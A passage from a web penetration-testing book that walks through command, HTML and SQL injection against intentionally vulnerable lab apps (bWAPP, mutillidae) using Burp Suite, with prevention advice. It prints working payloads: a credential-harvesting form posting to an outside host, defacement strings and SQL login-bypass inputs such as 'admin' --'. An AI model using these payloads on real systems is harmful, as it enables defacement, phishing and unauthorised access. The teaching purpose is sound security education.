We can use the Comparer tool to watch the difference. The content length will vary to a great extent. Click the second mouse button and send it to the Compare to Response section. It will give us the lowest and the highest payload response, depending on the content length (Figure 9-12).



Figure 9-12. The Comparer tool displays the lowest and the highest payload response.

On the bottom right-hand side, you can click the Words button, which will give you how many words the payload responses contain (Figure 9-13).



Figure 9-13. The words length of the payloads responses

It varies a lot. The lowest one is 48,665 and the highest one is 50,039. Not only that, but we can also see the output, where it is evident that our attack is successful. As you go downward, you will see the full directory listings in the highest payload response (Figure 9-14).



Figure 9-14. The directory listings on the Comparer tool

As proof of concept, we can conclude that the application has command injection vulnerabilities.

CHAPTER 10

Finding HTML and SQL Injection Vulnerabilities

In this chapter, we will learn what HTML injection and SQL injection are. We will also learn how we can prevent them. HTML injection and SQL injection are different. Therefore, we will learn them separately. In the first half of this chapter we will talk about HTML injection, and in the second part we will talk about SQL injection.

What Is HTML Injection?

In this book, we have already learned about many types of attacks. We have seen that a web application may have many types of vulnerabilities that attackers can exploit using different types of attack. We have also learned that good security testing is a part of prevention. As a penetration tester, your job will be to find those vulnerabilities for your clients in a web application.

Let me tell you about the one key feature of HTML injection, in the very beginning. HTML injection is rare. And it is not considered as severe as Cross-site Scripting or XXE attacks. However, it could be disruptive because it could deface a web site. It could change the appearance of the web site. It cannot penetrate through the system and steal the data.

It cannot even destroy the database. However, this part of security testing should not be missed because, as I have mentioned earlier, it could deface a web site's appearance and that may cost your client's reputation. In this section we will see how we can test it. We will also learn how to prevent it.

We should be aware of another risk. The HTML injection attackers may try to steal a user's data by posting a fake login form. We will find such vulnerabilities in our virtual lab.

Furthermore, we can summarize a few key points about HTML injection:

- HTML injection is a rendering attack.
- HTML injection code is injected into a web page.
- A web site executes that HTML injection code and renders its contents.
- It is often considered as a subsection of Cross-site Scripting (XSS) attack, since, in some cases, it leads to XSS attack and could be more dangerous.

In the next step, we will start our virtual lab and open Kali Linux and the OWASP broken web application. For the first test, we need the intentionally vulnerable bWAPP application.

Finding HTML Injection Vulnerabilities

The HTML injection attackers may try to test your web application by injecting arbitrary HTML code into a vulnerable web page. The following page of the bWAPP application shows us a vulnerable login form. Here you can enter any type of HTML injection. The page will execute and render the output. It is called reflected HTML injection because it will reflect the output to the end-user (Figure 10-1). Basically, the user is able to control the input point and inject arbitrary HTML code that may include malicious links, which may trigger more sinister XSS attacks. It is reflected because

the HTML code is rendered and controlled by the user. As a penetration tester, you can test a client's web application by injecting arbitrary HTML code. If it reflects, and is controlled by you, the application has vulnerabilities. The input forms are not properly sanitized.

Applications -	Places -	O Firefox E	5R 🕶		Мо	n 20:38					1	12	1	<) ()	+
6				ЬV	VAPP - HTML Inj	jection - Mozill	la Firefox						c) 0	0
S SWAPP - HTM	IL Injection >	(+													
€ → ℃ @		① 192.168.2.	2/bWAPP/htmli_g	et.php			··· 🛡 🕁					0			=
A Most Visited	Kali Train	ing 🥆 Kali To	ols MSFu Ø	Most Visited	Getting Starte	d 🛅 Fedora I	Project 🛅 Red	Hat Em F	ree Content	E From (Soogle Chr	ome			>>
				- Wasserson	nen en	-		400	and the						
Bugs	Change P	assword	Create User	Set Sec	curity Level	Reset	Credits	Blog	Logou	· •					
															-
1		I Inia	alian	Palla	atad (CET)	1								
/	HIM	il inje	CTION -	Ketle	стеа (GEI	/			6					
Entr	er vour first a	nd last name:								in					
Eire	t name:									C					
113	CTRUTTE.		1												
										f					
Last	t name:		n .												
	Go														
WAPP IS F	for education	al purposes or	ly / Follow Child	n Twitter	and ask. For a	r cheat sheel	, containing all s	olutional /	Need a train	1 0 20	+ MME BY	/BA			

Figure 10-1. The bWAPP vulnerable web page

In this page I have entered my first name in the first text box, but in the second text box I've entered this simple HTML code:

//code 10.1

<h1>You can add any HTML code here...</h1>

You can see the reflected HTML injection in Figure 10-2. The vulnerable web page executes the code and renders it in the lower part of the web page.

Applications - Places	Firefox ESR	Mc	n 20:43					1 44	1 :	0.
10.		bWAPP - HTML In	ection - Mozilla Fi	refox					0	•
😵 bWAPP - HTML Injection	× +									
€ → C @	() 192.168.2.2/bWAPP/	ntmli_get.php?firstname=sanjib&lastna	me= <h1>Yo</h1>	… 🖸 🕁	lin I	D 🛛 🕅	00			Ø 3
🌣 Most Visited 🥆 Kali Tra	ining 🥆 Kali Tools 🛐 MS	Fu 🔅 Most Visited 🐞 Getting Starte	d 🛅 Fedora Proje	ect 🛅 Red H	lat 🛅 Free Cor	tent 🛅 Fro	om Google Cl	hrome		×
Bugs Change	Password Create	User Set Security Level	Reset	Credits	Blog La	ogout	Viewane	Sarjio		
							and the second second			
/ 11-0		B. Martall								
/ HIT	nil injectio	1 - Ketlectea (GEII				8			
Enter your firs	t and last name:						in			
First name:							63			
Last name:										
Go										
Welcome san	ib									
1 Val	con add a	NU HTML code	hora	1						
100	CUITUUUU	INY TITIL COUR		1						
INVARPS is for educat	ional purposes only / Follow	CAME IT on Twitter and ask for a	r cheat sheet, co	ntaining all sol	lutional / Need a		2.014 MME	BVBA		

Figure 10-2. In the lower part of the web page of the bWAPP application, HTML injection code has done the damage.

Let us open Burp Suite and, with the intercept on, we will allow the data to pass through it. Since the bWAPP application has been made intentionally vulnerable, the form data has not been validated properly; we can read anything that passes through the form fields (Figure 10-3).



Figure 10-3. We can read any data of the bWAPP login form that passes through Burp Suite.

Here is the output that shows everything about the POST data, including the cookie and session ID.

//code 10.2

```
POST /bWAPP/htmli post.php HTTP/1.1
Host: 192.168.2.2
User-Agent: Mozilla/5.0 (X11; Linux x86 64; rv:60.0)
Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/
xml;q=0.9,*/*;q=0.8
Accept-Language: en-US, en; q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.2.2/bWAPP/htmli post.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Cookie: PHPSESSID=n34706npi41did8c59klvta455; acopendivids=swing
set,jotto,phpbb2,redmine; acgroupswithpersist=nada; security
level=0
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
```

```
firstname=sanjib&lastname=sinha&form=submit
```

Next, we will demonstrate how an HTML injection occurs and how a web page is ripped from top to bottom by getting defaced. Since this type of attack deals with the appearance of the web application, a single page, it may be considered as less risky. As far as the valuable data of the system or the user is concerned, it is indeed less risky; still, it should not be skipped in the penetration testing. Why? It could lead to a bigger attack. A vulnerable web page also shows the user's session cookie, as we have just seen in the Burp Suite output (code 10.2). An attacker can use it and launch an XSS attack, which could be more dangerous.

Next, in the bWAPP application, we will see how stored HTML injection works. It is stored in the database and then it gets reflected. The basic difference between reflected and stored HTML injection deals with the risk involved. The stored HTML injection is riskier and could be more unsafe. You will see why in a moment.

Let us open the bWAPP stored blog page and enter simple HTML code in the text box. It is reflected on the web page (Figure 10-4).



Figure 10-4. We have entered an HTML injection code in the bWAPP application's stored blog page.

Granted, it is quite simple and there is nothing new in it, but what happens if we enter a form to submit some credentials there? There lies a great danger. Let us see how it works.

We are going to enter this simple HTML form that will only take a username.

//code 10.3

```
<form name="login" action="http://10.0.2.15:1234/test.html"
```
```
Username:<input type="text" name="username"
<input type="submit" value="Submit" />
</form>
```

We are not going to make it more complicated. We want to understand the mechanism first. We could have asked for more data from the user, luring them by assuring some false benefits. Once we have submitted the HTML form through that text box, it gets reflected on the web page. Now we will open the Burp Suite and, keeping its intercept on, we will try to capture the data. Our mission is to read and capture all user data that a user submits to that form (Figure 10-5).



Figure 10-5. We have successfully posted a login form in the bWAPP application.

Now you can write anything here. I have entered the same word. Simultaneously, I have opened the Burp Suite, keeping its intercept on (Figure 10-6).



Figure 10-6. The Burp Suite reads the submitted data in thebWAPP application.

Here is the little output that Burp Suite captured.

```
//code 10.4
GET /test.html?username=anything HTTP/1.1
Host: 10.0.2.15:1234
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0)
Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/
xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.2.2/bWAPP/htmli_stored.php
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
```

There are lots of vulnerabilities we have already detected in the application. If we go to the source code, we'll find that the HTML form has not been encoded properly.

If it was encoded properly, it would look like this:

Another thing is very important here. You can read the data in clear text on the URL. It should have been encrypted. Therefore, Burp Suite also reads the data quite easily and captures everything that has been submitted through the form.

If the HTML form submission process was properly encoded, the bWAPP application stored blog would reflect the web page like Figure 10-7. The attacker is no longer able to exploit that vulnerability.



Figure 10-7. The form is no longer visible in the stored blog page of the bWAPP application.

Exploiting HTML Injection

Sometimes a web application gives users a separate interface to change the color or fonts. The problem is, as a developer you need to use the form to accept the requests from the users. If your form data is not properly validated, encoded, or the HTML scripts are not stripped off, an attacker might take a chance to deface the web site.

For this test, we need another intentionally vulnerable web application: mutillidae. Let us open it and go to the web page, where we can change the color of the page by submitting data (Figure 10-8). While we are changing the color of the page, we inject HTML injection code and see the result.



Figure 10-8. HTML injection code is used while changing the color of the web page using the mutillidae application.

If this web page form data was properly validated, you couldn't have submitted anything other than the color value. However, this web application is made intentionally vulnerable; therefore, we can inject HTML injection code and it will reflect the changed web page immediately (Figure 10-9).



Figure 10-9. The HTML injection code has changed and defaced the web page.

This time the code is tricky, as we need to add special characters so that it will reflect the HTML injection effect with the color.

//code 10.7

FF0000"><h1>This site has been HACKED"</h1>

We have used the closing tag and added the HTML injection code after the value of the color. This is another instance of reflected HTML injection. In the next step, we will see how we can do some more damage to the stored blog page (Figure 10-10).



Figure 10-10. HTML injection in the blog page of the mutillidae application

This time we are going to add some moving text on the blog page. The code is like this:

//code 10.8

I am going to inject HTML code<h1><marquee>This site has been hacked!</marquee></h1>

Figure 10-11 displays how we add the HTML injection code to the blog page.



Figure 10-11. Adding HTML injection in the blog page of the mutillidae application

The <marquee> element starts working immediately. In the blog page, we can see the moving text over the other posts. In Figure 10-12, we see the first part of the moving text.

	Pilelox ESK ·	1000:14				No.		1		ſ
		Mozilla Firefo	ĸ					0		9
192.168.2.2/mutillidae/	× +									
-) → C' @	③ 192.168.2.2/mutillie	ae/index.php?page=add-to-your-blog.php	🖸 🕁	III\ 🖽	o 🛞 🕑		•			-
Most Visited 🕆 Kali Tra	ining 🥆 Kali Tools 🚮 N	ISFu 🌣 Most Visited 🔞 Getting Started 🛅 Fe	dora Project 🛅 Red Hat	E Free Content	E From Goo	gle Chrom	e		>	,
You	View Blogs									
Video Tutorials	is site has been This site has been This site	as been hacked! ^{hacked!} e has been hacked	1							
Video Tutorials	is site h This site has been This site	as been hacked! hacked! e has been hacked 4 curre	! nt Blog Entries						1	
Video Tutoriais OWASP	is site h This site has been This site	e has been hacked! e has been hacked 4 Curre Date	! nt Blog Entries	Co	mment]	
Video Tutoriais	is site h This site has been This site Nam	as been hacked! • hacked! • has been hacked • 0ate 2019-08-13 00:13:56	I am going t	Co to inject HTML	mment code					
Video Tutoriais	is site h This site has been This site This site anonymous 2 anonymous	as been hacked! hacked! e has been hacked <u>4 Curre</u> <u>2019-08-13 00:13:56</u> 2019-08-13 00:12:54	I am going i l am going i	Co to inject HTML to inject HTML	mment code code				-	
Video Tutoriais	is site h This site has been This site This site Nam 1 anonymous 3 anonymous	As been hacked! b hacked! b has been hacked 2019-08-13 00:13:56 2019-08-13 00:12:04	I am going i l am going i l am going i	Co to inject HTML i to inject HTML to inject HTML	mment code code code					

Figure 10-12. Over the other texts, the "marquee" element moves the text.

In Figure 10-13, we can see the text is almost disappearing over the other texts of the web page.



Figure 10-13. The "marquee" text is disappearing over the other texts.

Preventing HTML Injection

I have said earlier, HTML injection is not as risky as SQL injection, which we will learn in the next section. However, a penetration tester should have a good knowledge of web structure, especially how the HTML language works.

The request and response cycle often depends on form inputs. Therefore, every input should be checked if it contains any script code or any HTML code. Hence, proper validation is the best solution. Every programming language has its stripping-tags functions. In any case, no code should contain any special characters or HTML brackets— <script></script>, <html></html>. The selection of checking functions depends on the programming language, which is the developer's job. However, a penetration tester should point it out in the proof of concept.

In the proof of concept, a penetration tester also should mention these unavoidable steps that would prevent HTML injection. Include all types of escaping characters that I have mentioned earlier. This "escape" includes HTML, JavaScript, CSS, JSON, and URLs. The rule is never to trust user input. The HTML escape should be used before inserting user inputs into HTML element content. This rule is applied for attribute escaping in HTML common attributes.

Sanitizing HTML markup with a proper library and implementing content security policy are two important factors that should be maintained for HTML injection prevention.

What Is SQL Injection?

A web application usually makes queries to the database when it is requested to respond. An attacker may interfere with these queries if this web application is vulnerable. Therefore, we can say that SQL injection (SQLi) is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database.

To prevent SQL injection, data segmentation by using routines such as stored procedures and user-defined functions are necessary. Otherwise, these vulnerabilities allow an attacker to view data that is not normally available for general users. This data may belong to other users. It may belong to the application data category. An application is supposed to access this data. However, these particular web security vulnerabilities open the floodgate, and an attacker may access them all through the back door. In many cases, an attacker may modify or delete the data, causing persistent changes to the application's behavior.

SQL injection attacks may cause serious damage to the application when the attacker compromises the underlying server. The attacker may interfere with the back-end infrastructure by using SQL injection to perform a denial-of-service attack, which could be more damaging to the application. We can test a web application in our virtual lab to see whether it has SQL injection vulnerabilities; to do that, we need the intentionally vulnerable web application mutillidae and Burp Suite.

Bypassing Authentication by SQL Injection

Open the mutillidae application and open the "User Info (SQL) page" (Figure 10-14).



Figure 10-14. User info (SQL) page in mutillidae

We need to register here as a new user, and I have created a new user account. The user name is "sanjib." The password is "123456," and the signature is "I am Sanjib" (Figure 10-15).

```
//code 10.9
Username=sanjib
Password=123456
Signature=I am Sanjib
```



Figure 10-15. Creating a new user account in mutillidae

As a general user, I am not supposed to view other user accounts' details and I should not be able to log in as other users, say as admin. If the database is protected, and the web application has no vulnerabilities, a user's movement is restricted. This is because the SQL query selects only one user when they are logged in. Let us see the code:

//code 10.10

```
SELECT * FROM accounts WHERE username="sanjib" AND
password="123456";
```

Let us study this code minutely. It is a logical statement. The user name and the password should match. It is only true when both statements are true. However, this is an injection point. We can write one statement like this in the input field of the form:

```
//code 10.11
sanjib' --
```

This means we close the single quote of the user name and then pass two hyphens, meaning the rest of the SQL statement is commented out. The vulnerable web application will read this statement as the following:

//code 10.12

```
SELECT * FROM accounts WHERE username="sanjib" -- ;
```

In such a case, it does not require the password anymore. When the rest is commented out, it conveys the message that the rest is not required. In that case, it gives the accounts detail of that particular user. Now we can build up our query in a manner where the statement is true all the time.

Our query will look like this:

//code 10.13

```
SELECT * FROM accounts WHERE username="sanjib" OR 6=6 -- ;
```

In the preceding statement, if either one is TRUE, the query will work. However, we know the user name; it is true. The OR statement gives another parameter that is 6=6; it always comes out TRUE. So the whole statement is true anyway. After that we have commented out the rest; it means the statement is true for all the records in the database (Figure 10-16).



Figure 10-16. Getting all the records by SQL injection

Because the application has vulnerabilities, we get all the records of the user accounts due to this malicious SQL injection.

```
//code 10.14
Username=admin
Password=admin
Signature=g0t r00t?
Username=adrian
Password=somepassword
Signature=Zombie Films Rock!
Username=john
Password=monkey
Signature=I like the smell of confunk
Username=jeremy
Password=password
Signature=d1373 1337 speak
Username=bryce
Password=password
Signature=I Love SANS
Username=samurai
Password=samurai
Signature=Carving fools
_ _ _
```

The output is shortened for brevity. We have 23 records altogether.

A statement that is true by necessity or by its logical form is known as a tautology. In SQL injection, the tautology plays a vital role. Let's return to our original starting point: //code 10.15

```
SELECT * FROM accounts WHERE username="sanjib" AND
password="123456";
```

Here the word SELECT is known as the projection or the subject of the statement. It selects a field from a table or a group of tables joined together by a union. The word WHERE stands for the predicate of the statement. In the predicate part, we need a series of conditions, because after that it checks whether the statement is true. When we write, SELECT * FROM accounts WHERE username='sanjib OR 1=1 -- ;, it checks the condition at runtime and the query is formed.

Now, in this tautology, we don't always need the second condition to be like 1=1 or 6=6. Let us see the MySQL Boolean literal page (Figure 10-17).



Figure 10-17. MySQL Boolean literal page

Here SELECT TRUE OR true equals 1, always. The constants, true and false, are always evaluated as 1 and 0. Therefore, how about this query?

//code 10.16

SELECT * FROM accounts WHERE username="sanjib" OR 1 --

In the input field we can put this value:

//code 10.17

sanjib' OR 1 --

It will give us all the records like before. Furthermore, we may want to get one particular row and target that row to get one record. Suppose the attacker doesn't want all the records; instead, they want to log in as the admin user (Figure 10-18).



Figure 10-18. The user logged in as admin and sees the accounts record.

How can we make that possible? Well, if we examine the statement minutely, we can get our answer. We don't need tautology here. Rather, we should concentrate on the user name. In many applications, the administrator uses the name admin as the user name. We can target that, and in the input box we can place this statement:

```
//code 10.18
```

```
admin' --
```

In an application full of vulnerabilities, the query is formed like this:

//code 10.19

```
SELECT * FROM accounts WHERE username="admin" -- ;
```

It selects only the record of admin. We can safely log in as admin now. The upper right-hand side shows that the user is authenticated (Figure 10-19).



Figure 10-19. Logged in as admin

Discovering the Database

One of the key features of SQL injection involves knowledge of the database. You need to know which database is working as the back-end infrastructure. You cannot use the same fuzzing of the MySQL database in Microsoft SQL Server. We can use the Burp Suite tools to discover that information.

Let us first open the mutillidae application and try to log in with any random string as a user name (Figure 10-20).

Appli	cati	ons 🕶	Plac	ces 🕶	100	om-install	4j-runtime-	launcher	-UnixLau	ncher -		Sat 02	53						1	# / 0	0	*
									Burp Sui	te Com	munity	Edition	1.7.36 - Tem	porary P	Project					0	Θ	0
Burp 1	ntruck	er Repai	ter Wind	ow Help																		
Targe	E P	raxy S	ider S	canver	Intrude	er Repeater	Sequencer	Decoder	Comparer	Extens	der Pro	et options	User options	Alerts	xstValidate	*					_	_
Interc	ant	HITP bir	tory W	lebSocket	a history	Options										-					_	_
Fiber H	idea	C55 kma	and or	meral hin	er, cont	ect															-	ได
1000.0			/e # 10 ye			ern.					1	Lange La	Le durche Leve		-			10	and in	×		10
	1000			104	Cross 1 V	JPIL .		Para	o coted	Status	Length	MINE LY.	Extension 14	×.		Comment	536	10°	Cookies	Terrie	1.0	AC. 1
234	https:	fftync-575	hus-west	-2. FO	ST K	1.5/90235708/9	torage/history/l	b V		200	696	JS/ON					1.1	34,217,74.67		0251:411	. 80	a 🔺
235	Mitps.	(Weberte	nsions.se	eb. 08	1 1	v1/buckets/def/	auto collections/e	8 V		200	6653	JSON					- ×	34.95.71.207		0251431	- 80	- T
236	netps.	Il webexte	nsions.se	m. 95	1 /	v1/buckets/def/	ault/collectionare	v		200	247	J\$0N					×.	34.95.71.207		0251431	- 90	2 III
287	hetps:	anyme-575	-us-west	-2.08		1.5/90235708/#	info/collections			200	900	JSON IS ON						34,217,74,67		0251441	- 80	2 II
229	Metps.	Illayne-075	hus-west	2. 05	T (1.5/90235.708/4	stal configur abor			200	804	JSON					÷.	34,217,74,67		0251451	- 00	a 🛛
240	in the second	anymour .	-us-mest	41 AF		A de chatelant	tor age cheres in	- ·		200	100.0	15 ON					- Č	34.65.73.567		02.51.451		a 🗉
240	heters.	(Inclusion of the	nations of	46 GE	2 2	All what of the	- hindlectional			200	547	15.04					- 5	94.95.71.207		0253.473		a II
242	and the later	192 168 1		80.00		and Balantonia	abo Ta ana a lan			200	50745	LITTLE I	aba.					10216823		0252021		a li
243	and the second	Table and a	and the second	- EO	57 4	downloads Toling	pro-page-up	in d		200	205	in the second	hé					541401017		02 52 05 1	-	
244	dia i	la internation de	A diamon	- 05	T	nor o londer b	ted.			203	242	LITER.	Let and					104 91 0 156		0252.051		a II.
245	han on	diversity over	vices mon	-1 65	2 7	bedreft states at				101	129							52 43 171 107		0252151		2.5
1		aponere			-																	аr,
6			6																			
Requ	tes	Flasponse	9																			_
Ram	Par	ams H	eaders	Hex																		
POST /m Host: 1	utill 92.14	Lidae/1/4	lex.php?	televiel	pin, phy	HTTP/1.1																ŕ
Arrent	A and	chinal an	olucati	an (sht a)	+ 106_6	e, rv.60.0)	oscie/201001	ond B	neo.d													
Accept.	Lanz	1008. 80	US. en: a	0.5		oppeace action of a	at , dec. 2, -3-3	and a														
Accept-	Enc or	fana: az	p. defl																			
Referer	htt	tp: //192	168.2.3	/mutill:	idae/in	dex pho?page	elogin php															
Content	-Тури	a: appli	at Lon/a	-www-far	m-urle	incoded																
Content	-Lery	pth: 59																				
Cookie:	show	whintsm1;	PHPSES	SID: 4v0	10evpo	(6) j rlgjt68dj	tl80; acopen	divids svi	ngset, jott	to, physiol/2	t, redein	e; acgroup	swithpersist=n	ada								
DNT: 1																						
Connect	LORC .	close																				
COOP ALSO			Dance.	• •																		
usemae	- 13C	starjtikg	passvor	de ac ogai	-prip-x	iupeut-button	rodra															
2	*	+		7jpe a s	earch be	iens															0 m	stches

Figure 10-20. The HTTP history in Burp Suite

We have kept the intercept on in our Burp Suite tool and get the HTTP history as the following output:

```
//code 10.20
POST /mutillidae/index.php?page=login.php HTTP/1.1
Host: 192.168.2.3
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0)
Gecko/20100101 Firefox/60.0
```

```
Accept: text/html,application/xhtml+xml,application/
xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.2.3/mutillidae/index.php?page=login.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 59
Cookie: showhints=1; PHPSESSID=4v0q10evpq6jjrlgjt68
djtl80; acopendivids=swingset,jotto,phpbb2,redmine;
acgroupswithpersist=nada
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
```

```
username=sadldfjfkg&password=&login-php-submit-button=Login
```

Watch the last line; we have typed in the random string sadldfjfkg as our user name and tried to log in. The password field was empty.

Now select the random string and add the special fuzzing character by clicking the "Add§" button on the right-hand side. We need to configure our Payloads position at that point so that we can start the attack from there.

//code 10.21

```
POST /mutillidae/index.php?page=login.php HTTP/1.1
Host: 192.168.2.3
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0)
Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/
xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.2.3/mutillidae/index.php?page=login.php
```

```
CHAPTER 10 FINDING HTML AND SQL INJECTION VULNERABILITIES
```

```
Content-Type: application/x-www-form-urlencoded
Content-Length: 59
Cookie: showhints=1; PHPSESSID=4v0q10evpq6jjrlgjt68
djtl80; acopendivids=swingset,jotto,phpbb2,redmine;
acgroupswithpersist=nada
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
```

```
username=s§adldfjfkg§&password=&login-php-submit-button=Login
```

We want to discover the database, so let us first assume that mutillidae is running MySQL as its database back end. In that case, we will check the string literals of MySQL. We know that a string is a sequence of bytes or characters. It is enclosed within either a single quote (') or double quote (") characters. Examples: 'sadldfjfkg' or "sadldfjfkg". We can place them next to each other joined by the quotation marks. Quoted strings placed next to each other are concatenated to a single string. The following lines are equivalent:

```
"sadldfjfkg"
"sa" " " "dldfjfkg"
```

Therefore, a single quote ('), a double quote ("), a % character, or a backspace "\" character are all treated as escape sequences in MySQL. We can add them as our payloads in Burp Suite later. Before that, we need to select the last line of the preceding code and send it to the Intruder. We check the payloads position first (Figure 10-21). We will check that no special characters are there anymore. That will pave the way to add our payloads separately later.



Figure 10-21. Checking the Payloads position

Click the Payloads button and add all payloads that we will need to inject. We have seen before how to add payloads individually: just keep these characters /, ', "", %.

Now, we have added these special characters as our payloads; after that, we will go to payloads options and add only "error" and "syntax" as our simple string Grep – Match (Figure 10-22).

Applications 🔻 Places 🔻 🔰 com-install4j-runtime-launcher-UnixLauncher 👻 Sat 02:57	1 .*	10-
Burp Suite Community Edition v1.7.36 - Temporary Project		•••
Burp Intruder Repeater Window Help		
Target Proxy Spider Scanner Intruder Repeater Sequencer Decoder Comparer Extender Project options User options Alerts xstValidator		
Target Postions Poyleads Options		
Use denial-of-service mode (no results)		
📄 Store full payloada		n
(a) Grep - Match		
These settings can be used to find result terms containing specified expressions.		
w		
If Plag result items with responses matching these expressions.		
Patte enter A		
ecception .		
Loan - invalid		
Remove that		
Clear access		
Ba ba		
not found		2
Add Enter a new item		
Match type: @ Sample string		
O reger		
Case sensitive match		
@ Grep - Extract		

Figure 10-22. Simple String Grep - Match in Payloads options

This will enable us to get all the errors and syntax-errors, from where we will get an idea about the database used in the application. Here we added the escape sequences individually, assuming that the mutillidae application has used MySQL database.

Now, as we have started the attack we have found that all escape sequences have been detected as "errors"; however, two of them have syntax-errors (Figure 10-23).



Figure 10-23. Highlighting the Intruder attacks in Burp Suite

We can select any of them, and it will reflect the request first (Figure 10-24).

Applica	tions - Place	:s 🔻 📲 co	m-insta	ll4j-runt	time-lau	ncher-U	nixLaur	cher 🔻	Sat 02:59	1 ,4	1 1	0	*
								h	ntruder attack 1		0	Θ	0
Attack S	eve Columns						_						
Results	Target Positions	Payloads Opti	ens										_
Filter: Sho	wing all items												6
Regu. A	Payload	Status	Error	Timeo.	Length	syntax	error	Comment					
0		200		8	50749		N N						
2		200	ŏ	ŭ	52637	S	S						
4	*	200	8	8	50749	8	8						
			10			100							
Rectard	[Barroom]												
	Lange and Lange	1											-
I have _	Warrs Headers P	tex	CTTR (1 1										-
iost: 192	168.2.3	and cogar, pro-		h danka ti									ŕ
iccept: t	ext/html,applicatio	n/whitel+wel.app	dication	/xml;q=0.	9, */*; q=0	B							
iccept-La iccept-En	oding: gzip, defla	0.5 Le											
keferer: content-1	<pre>vttp://192.168.2.3/ vpe: application/s-</pre>	nutillidae/inde www-form-urlenc	ex.php?pa coded	gerlogin.	tyb								
Content-L	ength: 53	The during intervention	i d'airea	dislan .	e complia i	dan ny i cont	at intte	shahit? radais	ar aromensithersistened				d
NT: 1	dan								the second s				Т
Jograde-I	secure-Requests: 1												
semane	AScSpassword=Slogi	n-php-submit-bu	ttormLog	in									1
(III) (II		Spe a search terr	1									0 mat	tche
Cristian I													_

Figure 10-24. The Request highlighting the syntax-errors

We can click the Response tab beside the Request tab and read the message. In that message, the error reports are shown in detail, where we can gather all the information about the database. Here we come to know that our guess has been correct, as the application mutillidae has used MySQL database as its back-end infrastructure (Figure 10-25). Knowing the back-end database infrastructure will help us in many ways. Now we can pinpoint our research on escape sequences that are particularly used for MySQL. If we had found a different database, our strategy of attacking would be distinctly separate from MySQL.

									1000		
							Intruder attack 1		0	Θ	8
Attack Save Co	olumns									_	
Results Targe	et Positions Payloads	Options									
liker: Showing al	d tems										0
Regul & Paylo	oad St.	us Error	Timeo	Length	syntax	error	Comment				
	20			50749		S					
2 1	20	i ii	0	52637	×.	S					
	20	8	8	50749	8	8					
Request Res	sponse										
Request Res	sponse rs Hax HTML Randar										
Request Res Raw Header	sonse s Hax HTML Render	1					Failure is always an option				
Request Res Raw Header Line	s Hex HTML Render						Failure is always an option				
Request Real Raw Header Line Code	rs Hex HTML Render						Failure is always an option				
Request Res Raw Headers Line Code File	sonse 15 Hex HTML Render 170 0 /owaspbwa/mutilidae	git/classes	/MySQLH:	andler.pt	1p		Failure is always an option				
Request Readers	ITO 0 //waspbwa/mutilida	git/classes git/classes	MySQLHi	andler.pt	IP Ip on line	165: Er	Failure is always an option				
Request Readers	ITTO Reader 170 0 /owaspbwa/mutilida /owaspbwa/mutilida connect erms: 0	git/classes git/classes	/MySQLH: /MySQLH:	andler.př	ip ip on line	165: Er	Failure is always an option				
Request Reader	170 0 70waspbwa/mutilida 70waspbwa/mutilida connect_ermo: 0 664	git/classes git/classes	/MySQLH: /MySQLH:	andler.pt	ip ip on line	165: Er	Failure is always an option				
Request Res Rew Header Line Code File Message	In the HTML Render	git/classes git/classes	/MySQLH: /MySQLH: 5QL synta	andler.př andler.př ax; check	ip ip on line the man	165: Er ual that	Failure is always an option resecuting query: orresponds to your MySQL server version for the right syntax to use near "s	Y at line 1			
Request Res Raw Header Line Code File Message	170 0 /owaspbwalmutilida connect error: 0 error: 1064 error: 100 have an e clert_info: 5.1.73 host_info: iccalhost	git/classes git/classes ror in your : ia UNIX soc	/MySQLH: /MySQLH: 5QL synta 5QL synta	andler.pł andler.pł w; check	ip ip on line the man	165: Er ual that	Failure is always an option r executing quen:	η" at line 1			
Request Real Pare Header Line Code File Message	x Hex HML Render	git/classes git/classes ror in your 1 1a UNIX soc	MySQLHi MySQLHi SQL synta ket account	andler.pt andler.pt ax; check	ip ip on line the man	165: Er ual that	Failure is always an option revecuting query: orresponds to your MySQL server version for the right syntax to use near "s	4" at line 1			

Figure 10-25. The message about the database in the Response section of Intruder

In this section, I have tried to give you an idea of how SQL injection works, by describing some common examples. I have also tried to explain the basic logical statements and tautology on which the SQL injection attacks are mainly based. There are a few good free resources available over the Internet where you can get more ideas about SQL injection. In Appendix, I will talk about other bug hunting tools and free resources that may help you.

The best resource for learning more about SQL injection is the tools section that Kali Linux has provided for all types of readers. As you progress and want to know about second order SQL injection, I think the following links will provide immense help. Furthermore, in the final chapter I talk about SQLMAP, another great tool for SQL injection, in great detail.

```
https://tools.kali.org/vulnerability-analysis/sqlmap
https://tools.kali.org/vulnerability-analysis/bbqsql
https://tools.kali.org/vulnerability-analysis/jsql
```

APPENDIX

Further Reading and What's Next

I hope you have gotten an idea of how, as a penetration tester, you could test a web application and find its security flaws by hunting bugs. In this concluding chapter, we will see how we can extend our knowledge of what we have learned so far. In the previous chapter, we saw how SQL injection has been done; however, we have not seen the automated part of SQL injection, which can be done by other tools alongside Burp Suite. We will use sqlmap, a very useful tool, for this purpose.

Tools that Can Be Used Alongside Burp Suite

We have seen earlier that the best alternative to Burp Suite is OWASP ZAP. Where Burp Community edition has some limitations, ZAP can help you overcome them. Moreover, ZAP is an open source free tool; it is community-based, so you don't have to pay for it for using any kind of advanced technique. We have also seen how ZAP works. Here, we will therefore concentrate on sqlmap only, another very useful tool we need for bug hunting.

